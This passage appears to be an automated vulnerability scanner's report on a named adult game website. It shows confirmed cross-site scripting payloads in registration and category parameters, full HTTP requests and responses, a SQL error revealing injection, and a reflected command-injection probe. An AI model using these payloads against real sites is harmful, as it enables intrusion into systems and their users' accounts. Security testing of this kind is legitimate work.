value="LY">Libya</option> <option value="LI">Liechtenstein</option> <option value="LT">Lithuania</option> <option value="LU">Luxembourg</option> <option value="MO">Macao</option> <option value="MK">Macedonia</option> <option value="MG">Madagascar</option> <option value="XA">Madeira Islands</option> <option value="MW">Malawi</option> <option value="MY">Malaysia</option> <option value="MV">Maldives</option> <option value="ML">Mali</option> <option value="MT">Malta</option> <option value="MH">Marshall Islands</option> <option value="MQ">Martinique</option> <option value="MR">Mauritania</option> <option value="MU">Mauritius</option> <option value="YT">Mayotte</option> <option value="MX">Mexico</option> <option value="MD">Moldova</option> <option value="MC">Monaco</option> <option value="MN">Mongolia</option> <option value="XB">Montenegro</option> <option value="MS">Montserrat</option> <option value="MA">Morocco</option> <option value="MZ">Mozambique</option> <option value="XD">Muscat And Oman</option> <option value="NA">Namibia</option> <option value="NR">Nauru</option> <option value="NP">Nepal</option> <option value="NL">Netherlands</option> <option value="AN">Netherlands Antilles</option> <option value="NC">New Caledonia</option> <option value="NZ">New Zealand</option> <option value="NI">Nicaragua</option> <option value="NE">Niger</option> <option value="NG">Nigeria</option> <option value="NU">Niue</option> <option value="KP">North Korea</option> <option value="NO">Norway</option> <option value="OM">Oman</option> <option value="PK">Pakistan</option> <option value="PA">Panama</option> <option value="PG">Papua New Guinea</option> <option value="PY">Paraguay</option> <option value="PE">Peru</option> <option value="PH">Philippines</option> <option value="PN">Pitcairn Islands</option> <option value="PL">Poland</option> <option value="PT">Portugal</option> <option value="QA">Qatar</option> <option value="IE">Republic of Ireland</option> <option value="RE">Reunion</option> <option value="RO">Romania</option> <option value="RU">Russia</option> <option value="RW">Rwanda</option> <option value="KN">Saint Christopher-Nevis</option> <option value="SH">Saint Helena</option> <option value="LC">Saint Lucia</option> <option value="PM">Saint Pierre And Miquelon</option> <option value="VC">Saint Vincent</option> <option value="SM">San Marino</option> <option value="ST">Sao Tome And Principe</option> <option value="SA">Saudi Arabia</option> <option value="XE">Scotland</option> <option value="SN">Senegal</option> <option value="XF">Serbia</option> <option value="SC">Seychelles</option> <option value="SL">Sierra Leone</option> <option value="SG">Singapore</option> <option value="SK">Slovakia</option> <option value="SI">Slovenia</option> <option value="SB">Solomon Islands</option> <option value="SO">Somalia</option> <option value="ZA">South Africa</option> <option value="KR">South Korea</option> <option value="ES">Spain</option> <option value="LK">Sri Lanka</option> <option value="SD">Sudan</option> <option value="SR">Surinam</option> <option value="SZ">Swaziland</option> <option value="SE">Sweden</option> <option value="CH">Switzerland</option> <option value="SY">Syria</option> <option value="TW">Taiwan</option> <option value="TJ">Tajikistan</option> <option value="TZ">Tanzania</option> <option value="TH">Thailand</option> <option value="XG">Tobago</option> <option value="TG">Togo</option> <option value="TK">Tokelau</option> <option value="TO">Tonga</option> <option value="TT">Trinidad And Tobago</option> <option value="XH">Tristan Da Cunha</option> <option value="TN">Tunisia</option> <option value="TR">Turkey</option> <option value="TM">Turkmenistan</option> <option value="TC">Turks &amp; Caicos Islands</option> <option value="TV">Tuvalu</option> <option value="UG">Uganda</option> <option value="UA">Ukraine</option> <option value="AE">United Arab Emirates</option> <..
- /user.php

/user.php CONFIRMED

http://www.lessonofpassion.com/user.php?type=register

Parameters

Parameter Type Value
type GET register
stage POST adduser
usernamex POST Ronald Smith
passwordx POST 3
password2x POST '"--></style></script><script>alert(0x00020A)</script>
emailx POST netsparker@example.com
country POST AF

Request

POST /user.php?type=register HTTP/1.1
Referer: http://www.lessonofpassion.com/user.php?type=register
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.lessonofpassion.com
Cookie: PHPSESSID=07a3ec0f17402878dc4cc311f0357beb
Content-Length: 188
Accept-Encoding: gzip, deflate

stage=adduser&usernamex=Ronald+Smith&passwordx=3&password2x='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00020A)%3c%2fscript%3e&emailx=netsparker%40example.com&country=AF

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:00:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 4445
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>Lesson of Passion - erotic flash games</title><META name="Description" content="Official Lesson of Passion website.Presented games features:chat, kiss and have sex with new girls, featuring Aria Giovanni, Anita Dark, Nicole Sheridian, Lucia Tovar Crissy Moran and more dress-up: buy new clothes such as tops, skirts, lingerie, shoes and try everything in various combinations on Aria select your character from 4 available profiles: sportsman, technician, businessman and heartbreaker become a jury of a beauty contest remodeled meetings with Aria brand new sex scenes bang a hooker or purchase yourself a lovedoll specially selected music form newgrounds audio portal and more "><META name="Keywords" content="lesson of passion, lop, erotic flash, games, lop, black edition, lesson of passion 2, leonizer, mobile games, mobile, aria giovanni"> <meta name="robots" content="all"><style type="text/css"><link rel="shortcut icon" href="/favicon.ico"></style><script src="AC_RunActiveContent.js" type="text/javascript"></script><link rel="stylesheet" href="nivo-slider.css" type="text/css" media="screen" /><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script><script src="jquery.nivo.slider.pack.js" type="text/javascript"></script><script type="text/javascript">$(window).load(function() { $("#slider").nivoSlider();});</script><!--body { background: #000000 url(back.jpg) no-repeat center top; margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--><link href="lop_style.css" rel="stylesheet" type="text/css"></head><body> <center><span class = "regular"><div id="site"> <div id="siteleft"> <a href="index.php" id = "logo"><img src="loplogo.png" border ="0" /></a><div class="clearfix"> </div></div><div id="sitecontent2"> <span class = "headx">Ronald Smith<br /></span>&nbsp;&nbsp;<img src="avatar_01.jpg" border ="0" class = "avatar"/><br />EXP: 0 | <a href="user.php" class = "po">YOUR ACCOUNT</a> | <a href="user.php?type=logout" class = "po">LOGOUT</a><br /></div><div class="clearfix"> </div><div class="clearfix"> </div><div id="siteleft"> <span class = "master">Game collections</span><br /><br /><a href="games_dev.php?type=category&category=lop">Lesson of Passion games</a><br /><a href="games_dev.php?type=category&category=mnf">Meet and Fuck games</a><br /><a href="games_dev.php?type=category&category=shark">Shark`s Lagoon games</a><br /><a href="games_dev.php?type=category&category=shg">Sex Hot Games games</a><br /><br /><br /><span class = "master">Game categories</span><br /><br /><a href="games_best.php">Best games</a><br /><a href="games_new.php">New games</a><br /><a href="games_category.php?type=category&category=dating">Dating games</a><br /><a href="games_category.php?type=category&category=adventure">Adventure games</a><br /><a href="games_category.php?type=category&category=logical">Logical games</a><br /><a href="games_category.php?type=category&category=tease">Tease games</a><br /><a href="games_category.php?type=category&category=arcade">Arcade games</a><br /><br /><span class = "master">Our other websites</span><br /><br /><a href="http://www.playforceone.com" target = "_blank">Play Force One</a><br /><a href="http://www.sexizu.com" target = "_blank">Sexizu</a><br /><br /><br /> <center><a href="http://www.sextronix.com/hit/144/110138/1/1/default/" target = "_blank"><img src="lopsalesforce/vert_3dbg.jpg" border="0"></a></center></div><div id="sitecontent"> <span class="big">New Player registration</span><br /><br />Registration ERROR: Your password is different that password confirmation<br /><br /><FORM METHOD=POST><INPUT TYPE="hidden" NAME="stage" VALUE="adduser"><B>Username</B> <br /><INPUT TYPE="text" NAME="usernamex" SIZE=20 class="form" value = "Ronald Smith"><br /><br /><B>Password</B> <br /><INPUT TYPE="text" NAME="passwordx" SIZE=20 class="form" value = "3"><br /><br /><B>Password confirmation</B> <br /><INPUT TYPE="text" NAME="password2x" SIZE=20 class="form" value = "\'\"--></style></script><script>netsparker(0x00020A)</script>"><br /><br /><B>E-mail</B> <br /><INPUT TYPE="text" NAME="emailx" SIZE=20 class="form" value = "netsparker@example.com"><br /><br /><B>Country</B> <br /><select name="country"> <option value="AF">Afghanistan</option> <option value="AL">Albania</option> <option value="DZ">Algeria</option> <option value="AS">American Samoa</option> <option value="AD">Andorra</option> <option value="AO">Angola</option> <option value="AI">Anguilla</option> <option value="AG">Antigua And Barbuda</option> <option value="AR">Argentina</option> <option value="AM">Armenia</option> <option value="AW">Aruba</option> <option value="X1">Ascension</option> <option value="AU">Australia</option> <option value="AT">Austria</option> <option value="AZ">Azerbaijan</option> <option value="X2">Azores</option> <option value="BS">Bahamas</option> <option value="BH">Bahrain</option> <option value="BD">Bangladesh</option> <option value="BB">Barbados</option> <option value="BY">Belarus</option> <option value="BE">Belgium</option> <option value="BZ">Belize</option> <option value="BJ">Benin</option> <option value="BM">Bermuda</option> <option value="BT">Bhutan</option> <option value="BO">Bolivia</option> <option value="X3">Bophuthatswana</option> <option value="BA">Bosnia-Hercegovina</option> <option value="BW">Botswana</option> <option value="BR">Brazil</option> <option value="VG">British Virgin Islands</option> <option value="BN">Brunei</option> <option value="BG">Bulgaria</option> <option value="BF">Burkina Faso</option> <option value="BI">Burundi</option> <option value="CM">Cameroon</option> <option value="CA">Canada</option> <option value="CV">Cape Verde</option> <option value="KY">Cayman Islands</option> <option value="CF">Central African Republic</option> <option value="TD">Chad</option> <option value="X6">Channel Islands</option> <option value="CL">Chile</option> <option value="CN">China</option> <option value="CO">Colombia</option> <option value="KM">Comoros</option> <option value="CG">Congo</option> <option value="CK">Cook Islands</option> <option value="CR">Costa Rica</option> <option value="HR">Croatia</option> <option value="CU">Cuba</option> <option value="CY">Cyprus</option> <option value="CZ">Czech Republic</option> <option value="CS">Czechoslovakia</option> <option value="DK">Denmark</option> <option value="DJ">Djibouti</option> <option value="DM">Dominica</option> <option value="DO">Dominican Republic</option> <option value="EC">Ecuador</option> <option value="EG">Egypt</option> <option value="SV">El Salvador</option> <option value="X4">England</option> <option value="GQ">Equatorial Guinea</option> <option value="ER">Eritrea</option> <option value="EZ">Espana</option> <option value="EE">Estonia</option> <option value="ET">Ethiopia</option> <option value="FK">Falkland Islands</option> <option value="FO">Faroe Islands</option> <option value="FJ">Fiji</option> <option value="FI">Finland</option> <option value="FR">France</option> <option value="GF">French Guiana</option> <option value="PF">French Polynesia</option> <option value="X5">French West Indies</option> <option value="GA">Gabon</option> <option value="GM">Gambia</option> <option value="DE">Germany</option> <option value="GE">Georgia, Republic Of</option> <option value="GH">Ghana</option> <option value="GI">Gibraltar</option> <option value="GR">Greece</option> <option value="GL">Greenland</option> <option value="GD">Grenada</option> <option value="GP">Guadeloupe</option> <option value="GU">Guam</option> <option value="GT">Guatemala</option> <option value="GN">Guinea</option> <option value="GW">Guinea-Bissau</option> <option value="GY">Guyana</option> <option value="HT">Haiti</option> <option value="HN">Honduras</option> <option value="HK">Hong Kong</option> <option value="HU">Hungary</option> <option value="IS">Iceland</option> <option value="IN">India</option> <option value="ID">Indonesia</option> <option value="IR">Iran</option> <option value="IQ">Iraq</option> <option value="X7">Isle Of Man</option> <option value="IL">Israel</option> <option value="IT">Italy</option> <option value="CI">Ivory Coast</option> <option value="JM">Jamaica</option> <option value="JP">Japan</option> <option value="X8">Jersey</option> <option value="JO">Jordan</option> <option value="X9">Kampuchea</option> <option value="KZ">Kazakhstan</option> <option value="KE">Kenya</option> <option value="KI">Kiribati</option> <option value="KW">Kuwait</option> <option value="KG">Kyrgyzstan</option> <option value="LA">Laos</option> <option value="LV">Latvia</option> <option value="LB">Lebanon</option> <option value="LS">Lesotho</option> <option value="LR">Liberia</option> <option value="LY">Libya</option> <option value="LI">Liechtenstein</option> <option value="LT">Lithuania</option> <option value="LU">Luxembourg</option> <option value="MO">Macao</option> <option value="MK">Macedonia</option> <option value="MG">Madagascar</option> <option value="XA">Madeira Islands</option> <option value="MW">Malawi</option> <option value="MY">Malaysia</option> <option value="MV">Maldives</option> <option value="ML">Mali</option> <option value="MT">Malta</option> <option value="MH">Marshall Islands</option> <option value="MQ">Martinique</option> <option value="MR">Mauritania</option> <option value="MU">Mauritius</option> <option value="YT">Mayotte</option> <option value="MX">Mexico</option> <option value="MD">Moldova</option> <option value="MC">Monaco</option> <option value="MN">Mongolia</option> <option value="XB">Montenegro</option> <option value="MS">Montserrat</option> <option value="MA">Morocco</option> <option value="MZ">Mozambique</option> <option value="XD">Muscat And Oman</option> <option value="NA">Namibia</option> <option value="NR">Nauru</option> <option value="NP">Nepal</option> <option value="NL">Netherlands</option> <option value="AN">Netherlands Antilles</option> <option value="NC">New Caledonia</option> <option value="NZ">New Zealand</option> <option value="NI">Nicaragua</option> <option value="NE">Niger</option> <option value="NG">Nigeria</option> <option value="NU">Niue</option> <option value="KP">North Korea</option> <option value="NO">Norway</option> <option value="OM">Oman</option> <option value="PK">Pakistan</option> <option value="PA">Panama</option> <option value="PG">Papua New Guinea</option> <option value="PY">Paraguay</option> <option value="PE">Peru</option> <option value="PH">Philippines</option> <option value="PN">Pitcairn Islands</option> <option value="PL">Poland</option> <option value="PT">Portugal</option> <option value="QA">Qatar</option> <option value="IE">Republic of Ireland</option> <option value="RE">Reunion</option> <option value="RO">Romania</option> <option value="RU">Russia</option> <option value="RW">Rwanda</option> <option value="KN">Saint Christopher-Nevis</option> <option value="SH">Saint Helena</option> <option value="LC">Saint Lucia</option> <option value="PM">Saint Pierre And Miquelon</option> <option value="VC">Saint Vincent</option> <option value="SM">San Marino</option> <option value="ST">Sao Tome And Principe</option> <option value="SA">Saudi Arabia</option> <option value="XE">Scotland</option> <option value="SN">Senegal</option> <option value="XF">Serbia</option> <option value="SC">Seychelles</option> <option value="SL">Sierra Leone</option> <option value="SG">Singapore</option> <option value="SK">Slovakia</option> <option value="SI">Slovenia</option> <option value="SB">Solomon Islands</option> <option value="SO">Somalia</option> <option value="ZA">South Africa</option> <option value="KR">South Korea</option> <option value="ES">Spain</option> <option value="LK">Sri Lanka</option> <option value="SD">Sudan</option> <option value="SR">Surinam</option> <option value="SZ">Swaziland</option> <option value="SE">Sweden</option> <option value="CH">Switzerland</option> <option value="SY">Syria</option> <option value="TW">Taiwan</option> <option value="TJ">Tajikistan</option> <option value="TZ">Tanzania</option> <option value="TH">Thailand</option> <option value="XG">Tobago</option> <option value="TG">Togo</option> <option value="TK">Tokelau</option> <option value="TO">Tonga</option> <option value="TT">Trinidad And Tobago</option> <option value="XH">Tristan Da Cunha</option> <option value="TN">Tunisia</option> <option value="TR">Turkey</option> <option value="TM">Turkmenistan</option> <option value="TC">Turks &amp; Caicos Islands</option> <option value="TV">Tuvalu</option> <option value="UG">Uganda</option> <option value="UA">Ukraine</option> <option value="AE">United Arab Emirates</option&g..
- /user.php

/user.php CONFIRMED

http://www.lessonofpassion.com/user.php?type=register

Parameters

Parameter Type Value
type GET register
stage POST adduser
usernamex POST Ronald Smith
passwordx POST 3
password2x POST 3
emailx POST '"--></style></script><script>alert(0x00020B)</script>
country POST AF

Request

POST /user.php?type=register HTTP/1.1
Referer: http://www.lessonofpassion.com/user.php?type=register
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.lessonofpassion.com
Cookie: PHPSESSID=07a3ec0f17402878dc4cc311f0357beb
Content-Length: 165
Accept-Encoding: gzip, deflate

stage=adduser&usernamex=Ronald+Smith&passwordx=3&password2x=3&emailx='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00020B)%3c%2fscript%3e&country=AF

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:01:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 4438
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>Lesson of Passion - erotic flash games</title><META name="Description" content="Official Lesson of Passion website.Presented games features:chat, kiss and have sex with new girls, featuring Aria Giovanni, Anita Dark, Nicole Sheridian, Lucia Tovar Crissy Moran and more dress-up: buy new clothes such as tops, skirts, lingerie, shoes and try everything in various combinations on Aria select your character from 4 available profiles: sportsman, technician, businessman and heartbreaker become a jury of a beauty contest remodeled meetings with Aria brand new sex scenes bang a hooker or purchase yourself a lovedoll specially selected music form newgrounds audio portal and more "><META name="Keywords" content="lesson of passion, lop, erotic flash, games, lop, black edition, lesson of passion 2, leonizer, mobile games, mobile, aria giovanni"> <meta name="robots" content="all"><style type="text/css"><link rel="shortcut icon" href="/favicon.ico"></style><script src="AC_RunActiveContent.js" type="text/javascript"></script><link rel="stylesheet" href="nivo-slider.css" type="text/css" media="screen" /><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script><script src="jquery.nivo.slider.pack.js" type="text/javascript"></script><script type="text/javascript">$(window).load(function() { $("#slider").nivoSlider();});</script><!--body { background: #000000 url(back.jpg) no-repeat center top; margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--><link href="lop_style.css" rel="stylesheet" type="text/css"></head><body> <center><span class = "regular"><div id="site"> <div id="siteleft"> <a href="index.php" id = "logo"><img src="loplogo.png" border ="0" /></a><div class="clearfix"> </div></div><div id="sitecontent2"> <span class = "headx">& SET /A 0xFFF9999-2 &<br /></span>&nbsp;&nbsp;<img src="avatar_01.jpg" border ="0" class = "avatar"/><br />EXP: 0 | <a href="user.php" class = "po">YOUR ACCOUNT</a> | <a href="user.php?type=logout" class = "po">LOGOUT</a><br /></div><div class="clearfix"> </div><div class="clearfix"> </div><div id="siteleft"> <span class = "master">Game collections</span><br /><br /><a href="games_dev.php?type=category&category=lop">Lesson of Passion games</a><br /><a href="games_dev.php?type=category&category=mnf">Meet and Fuck games</a><br /><a href="games_dev.php?type=category&category=shark">Shark`s Lagoon games</a><br /><a href="games_dev.php?type=category&category=shg">Sex Hot Games games</a><br /><br /><br /><span class = "master">Game categories</span><br /><br /><a href="games_best.php">Best games</a><br /><a href="games_new.php">New games</a><br /><a href="games_category.php?type=category&category=dating">Dating games</a><br /><a href="games_category.php?type=category&category=adventure">Adventure games</a><br /><a href="games_category.php?type=category&category=logical">Logical games</a><br /><a href="games_category.php?type=category&category=tease">Tease games</a><br /><a href="games_category.php?type=category&category=arcade">Arcade games</a><br /><br /><span class = "master">Our other websites</span><br /><br /><a href="http://www.playforceone.com" target = "_blank">Play Force One</a><br /><a href="http://www.sexizu.com" target = "_blank">Sexizu</a><br /><br /><br /> <center><a href="http://outcastacademy.com/index.php?targeo=lopvert" target = "_blank"><img src="lopsalesforce/outcastacademy_vert_160x600.jpg" border="0"></a></center></div><div id="sitecontent"> <span class="big">New Player registration</span><br /><br />Registration ERROR: Username already used<br /><br /><FORM METHOD=POST><INPUT TYPE="hidden" NAME="stage" VALUE="adduser"><B>Username</B> <br /><INPUT TYPE="text" NAME="usernamex" SIZE=20 class="form" value = "Ronald Smith"><br /><br /><B>Password</B> <br /><INPUT TYPE="text" NAME="passwordx" SIZE=20 class="form" value = "3"><br /><br /><B>Password confirmation</B> <br /><INPUT TYPE="text" NAME="password2x" SIZE=20 class="form" value = "3"><br /><br /><B>E-mail</B> <br /><INPUT TYPE="text" NAME="emailx" SIZE=20 class="form" value = "\'\"--></style></script><script>netsparker(0x00020B)</script>"><br /><br /><B>Country</B> <br /><select name="country"> <option value="AF">Afghanistan</option> <option value="AL">Albania</option> <option value="DZ">Algeria</option> <option value="AS">American Samoa</option> <option value="AD">Andorra</option> <option value="AO">Angola</option> <option value="AI">Anguilla</option> <option value="AG">Antigua And Barbuda</option> <option value="AR">Argentina</option> <option value="AM">Armenia</option> <option value="AW">Aruba</option> <option value="X1">Ascension</option> <option value="AU">Australia</option> <option value="AT">Austria</option> <option value="AZ">Azerbaijan</option> <option value="X2">Azores</option> <option value="BS">Bahamas</option> <option value="BH">Bahrain</option> <option value="BD">Bangladesh</option> <option value="BB">Barbados</option> <option value="BY">Belarus</option> <option value="BE">Belgium</option> <option value="BZ">Belize</option> <option value="BJ">Benin</option> <option value="BM">Bermuda</option> <option value="BT">Bhutan</option> <option value="BO">Bolivia</option> <option value="X3">Bophuthatswana</option> <option value="BA">Bosnia-Hercegovina</option> <option value="BW">Botswana</option> <option value="BR">Brazil</option> <option value="VG">British Virgin Islands</option> <option value="BN">Brunei</option> <option value="BG">Bulgaria</option> <option value="BF">Burkina Faso</option> <option value="BI">Burundi</option> <option value="CM">Cameroon</option> <option value="CA">Canada</option> <option value="CV">Cape Verde</option> <option value="KY">Cayman Islands</option> <option value="CF">Central African Republic</option> <option value="TD">Chad</option> <option value="X6">Channel Islands</option> <option value="CL">Chile</option> <option value="CN">China</option> <option value="CO">Colombia</option> <option value="KM">Comoros</option> <option value="CG">Congo</option> <option value="CK">Cook Islands</option> <option value="CR">Costa Rica</option> <option value="HR">Croatia</option> <option value="CU">Cuba</option> <option value="CY">Cyprus</option> <option value="CZ">Czech Republic</option> <option value="CS">Czechoslovakia</option> <option value="DK">Denmark</option> <option value="DJ">Djibouti</option> <option value="DM">Dominica</option> <option value="DO">Dominican Republic</option> <option value="EC">Ecuador</option> <option value="EG">Egypt</option> <option value="SV">El Salvador</option> <option value="X4">England</option> <option value="GQ">Equatorial Guinea</option> <option value="ER">Eritrea</option> <option value="EZ">Espana</option> <option value="EE">Estonia</option> <option value="ET">Ethiopia</option> <option value="FK">Falkland Islands</option> <option value="FO">Faroe Islands</option> <option value="FJ">Fiji</option> <option value="FI">Finland</option> <option value="FR">France</option> <option value="GF">French Guiana</option> <option value="PF">French Polynesia</option> <option value="X5">French West Indies</option> <option value="GA">Gabon</option> <option value="GM">Gambia</option> <option value="DE">Germany</option> <option value="GE">Georgia, Republic Of</option> <option value="GH">Ghana</option> <option value="GI">Gibraltar</option> <option value="GR">Greece</option> <option value="GL">Greenland</option> <option value="GD">Grenada</option> <option value="GP">Guadeloupe</option> <option value="GU">Guam</option> <option value="GT">Guatemala</option> <option value="GN">Guinea</option> <option value="GW">Guinea-Bissau</option> <option value="GY">Guyana</option> <option value="HT">Haiti</option> <option value="HN">Honduras</option> <option value="HK">Hong Kong</option> <option value="HU">Hungary</option> <option value="IS">Iceland</option> <option value="IN">India</option> <option value="ID">Indonesia</option> <option value="IR">Iran</option> <option value="IQ">Iraq</option> <option value="X7">Isle Of Man</option> <option value="IL">Israel</option> <option value="IT">Italy</option> <option value="CI">Ivory Coast</option> <option value="JM">Jamaica</option> <option value="JP">Japan</option> <option value="X8">Jersey</option> <option value="JO">Jordan</option> <option value="X9">Kampuchea</option> <option value="KZ">Kazakhstan</option> <option value="KE">Kenya</option> <option value="KI">Kiribati</option> <option value="KW">Kuwait</option> <option value="KG">Kyrgyzstan</option> <option value="LA">Laos</option> <option value="LV">Latvia</option> <option value="LB">Lebanon</option> <option value="LS">Lesotho</option> <option value="LR">Liberia</option> <option value="LY">Libya</option> <option value="LI">Liechtenstein</option> <option value="LT">Lithuania</option> <option value="LU">Luxembourg</option> <option value="MO">Macao</option> <option value="MK">Macedonia</option> <option value="MG">Madagascar</option> <option value="XA">Madeira Islands</option> <option value="MW">Malawi</option> <option value="MY">Malaysia</option> <option value="MV">Maldives</option> <option value="ML">Mali</option> <option value="MT">Malta</option> <option value="MH">Marshall Islands</option> <option value="MQ">Martinique</option> <option value="MR">Mauritania</option> <option value="MU">Mauritius</option> <option value="YT">Mayotte</option> <option value="MX">Mexico</option> <option value="MD">Moldova</option> <option value="MC">Monaco</option> <option value="MN">Mongolia</option> <option value="XB">Montenegro</option> <option value="MS">Montserrat</option> <option value="MA">Morocco</option> <option value="MZ">Mozambique</option> <option value="XD">Muscat And Oman</option> <option value="NA">Namibia</option> <option value="NR">Nauru</option> <option value="NP">Nepal</option> <option value="NL">Netherlands</option> <option value="AN">Netherlands Antilles</option> <option value="NC">New Caledonia</option> <option value="NZ">New Zealand</option> <option value="NI">Nicaragua</option> <option value="NE">Niger</option> <option value="NG">Nigeria</option> <option value="NU">Niue</option> <option value="KP">North Korea</option> <option value="NO">Norway</option> <option value="OM">Oman</option> <option value="PK">Pakistan</option> <option value="PA">Panama</option> <option value="PG">Papua New Guinea</option> <option value="PY">Paraguay</option> <option value="PE">Peru</option> <option value="PH">Philippines</option> <option value="PN">Pitcairn Islands</option> <option value="PL">Poland</option> <option value="PT">Portugal</option> <option value="QA">Qatar</option> <option value="IE">Republic of Ireland</option> <option value="RE">Reunion</option> <option value="RO">Romania</option> <option value="RU">Russia</option> <option value="RW">Rwanda</option> <option value="KN">Saint Christopher-Nevis</option> <option value="SH">Saint Helena</option> <option value="LC">Saint Lucia</option> <option value="PM">Saint Pierre And Miquelon</option> <option value="VC">Saint Vincent</option> <option value="SM">San Marino</option> <option value="ST">Sao Tome And Principe</option> <option value="SA">Saudi Arabia</option> <option value="XE">Scotland</option> <option value="SN">Senegal</option> <option value="XF">Serbia</option> <option value="SC">Seychelles</option> <option value="SL">Sierra Leone</option> <option value="SG">Singapore</option> <option value="SK">Slovakia</option> <option value="SI">Slovenia</option> <option value="SB">Solomon Islands</option> <option value="SO">Somalia</option> <option value="ZA">South Africa</option> <option value="KR">South Korea</option> <option value="ES">Spain</option> <option value="LK">Sri Lanka</option> <option value="SD">Sudan</option> <option value="SR">Surinam</option> <option value="SZ">Swaziland</option> <option value="SE">Sweden</option> <option value="CH">Switzerland</option> <option value="SY">Syria</option> <option value="TW">Taiwan</option> <option value="TJ">Tajikistan</option> <option value="TZ">Tanzania</option> <option value="TH">Thailand</option> <option value="XG">Tobago</option> <option value="TG">Togo</option> <option value="TK">Tokelau</option> <option value="TO">Tonga</option> <option value="TT">Trinidad And Tobago</option> <option value="XH">Tristan Da Cunha</option> <option value="TN">Tunisia</option> <option value="TR">Turkey</option> <option value="TM">Turkmenistan</option> <option value="TC">Turks &amp; Caicos Islands</option> <option value="TV">Tuvalu</option> <option value="UG">Uganda</option> <option value="UA">Ukraine</option> <option value="AE">United Arab Emirates</option> <option value..
- /games_category.php

/games_category.php CONFIRMED

http://www.lessonofpassion.com/games_category.php?offset='%22--%3E%3C/style%3E%3C/script%3E%3Cscript..

Parameters

Parameter Type Value
offset GET '"--></style></script><script>alert(0x00026D)</script>
id GET 3
category GET adventure

Request

GET /games_category.php?offset='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00026D)%3C/script%3E&id=3&category=adventure HTTP/1.1
Referer: http://www.lessonofpassion.com/games_category.php?type=category&category=adventure
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Cookie: PHPSESSID=23dbc668a5388626dfb199f6b4ffe058
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:01:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 176
Content-Type: text/html


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\"--></style></script><script>netsparker(0x00026D)</script>,20' at line 1
- /games_category.php

/games_category.php CONFIRMED

http://www.lessonofpassion.com/games_category.php?offset=20&id='%22--%3E%3C/style%3E%3C/script%3E%3C..

Parameters

Parameter Type Value
offset GET 20
id GET '"--></style></script><script>alert(0x000274)</script>
category GET adventure

Request

GET /games_category.php?offset=20&id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000274)%3C/script%3E&category=adventure HTTP/1.1
Referer: http://www.lessonofpassion.com/games_category.php?type=category&category=adventure
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Cookie: PHPSESSID=dfce1a506c315a7a092e0c4bd0736d06
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:01:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 2810
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>Lesson of Passion - adventure erotic flash games</title><META name="Description" content="Official Lesson of Passion website.Presented games features:chat, kiss and have sex with new girls, featuring Aria Giovanni, Anita Dark, Nicole Sheridian, Lucia Tovar Crissy Moran and more dress-up: buy new clothes such as tops, skirts, lingerie, shoes and try everything in various combinations on Aria select your character from 4 available profiles: sportsman, technician, businessman and heartbreaker become a jury of a beauty contest remodeled meetings with Aria brand new sex scenes bang a hooker or purchase yourself a lovedoll specially selected music form newgrounds audio portal and more "><META name="Keywords" content="lesson of passion, lop, erotic flash, games, lop, black edition, lesson of passion 2, leonizer, mobile games, mobile, aria giovanni"> <meta name="robots" content="all"><style type="text/css"><link rel="shortcut icon" href="/favicon.ico"></style><script 